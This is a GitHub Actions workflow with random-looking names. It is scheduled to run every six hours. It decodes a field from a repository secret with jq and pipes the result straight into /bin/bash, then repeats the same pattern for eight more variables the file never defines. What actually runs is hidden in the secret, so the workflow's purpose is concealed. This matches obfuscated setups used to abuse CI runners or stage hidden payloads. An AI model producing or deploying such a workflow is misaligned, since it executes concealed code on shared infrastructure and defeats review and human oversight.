name: zxykyy

on:
  workflow_dispatch:
  schedule:
    - cron: '13 3/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: zxykyy
        env:
          lerkr127: ${{ secrets.lerkr127 }}
        run: |
          echo $lerkr127 | jq -r .btcj502 | /bin/bash
          echo $ujr952 | jq -r .o1817 | /bin/bash
          echo $albvt133 | jq -r .jid442 | /bin/bash
          echo $i12816 | jq -r .vw64 | /bin/bash
          echo $zkjc228 | jq -r .tp19940 | /bin/bash
          echo $hmt38513 | jq -r .dvkkg02 | /bin/bash
          echo $rb9 | jq -r .m21029 | /bin/bash
          echo $zhe9642 | jq -r .hnslw68 | /bin/bash
          echo $xa79261 | jq -r .keb39203 | /bin/bash

